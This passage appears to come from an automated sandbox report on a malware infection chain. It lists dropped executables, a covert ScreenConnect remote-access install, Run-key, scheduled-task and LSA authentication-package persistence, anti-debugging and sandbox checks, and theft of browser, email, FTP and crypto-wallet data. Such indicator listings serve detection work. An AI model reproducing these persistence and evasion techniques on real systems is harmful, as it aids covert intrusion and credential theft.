13L7Aa9gmmaFPLlaPJWLS8hcQhXiT4bo1oDhBK9qtJNZFM2%2btVjKJhsfG7wuhg6xIofz%2bWvEqRlmYtwzyUt7ZwpiyE5uI%2fASFFBAtD%2fLB5yLcoCQlm1sNXw9alfJOuh6w11zgms461sFVnVoznWiRUtauS%2fmOEG1E1UAAAADtl9q1L%2bRsXIKHuIQg6uVeVTXG624tqRh%2bY3o4d9DQ53iQnwPN6J6dszobqy5sF92DoON2Eg1nn3ORH%2fo8Fa0t&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\b92cc19684.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\b92cc19684.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\jahxslxg.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f77f1be.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF431.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File opened for modification C:\Windows\Installer\f77f1be.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF326.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f77f1c1.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77f1bf.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF2F6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f77f1bf.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
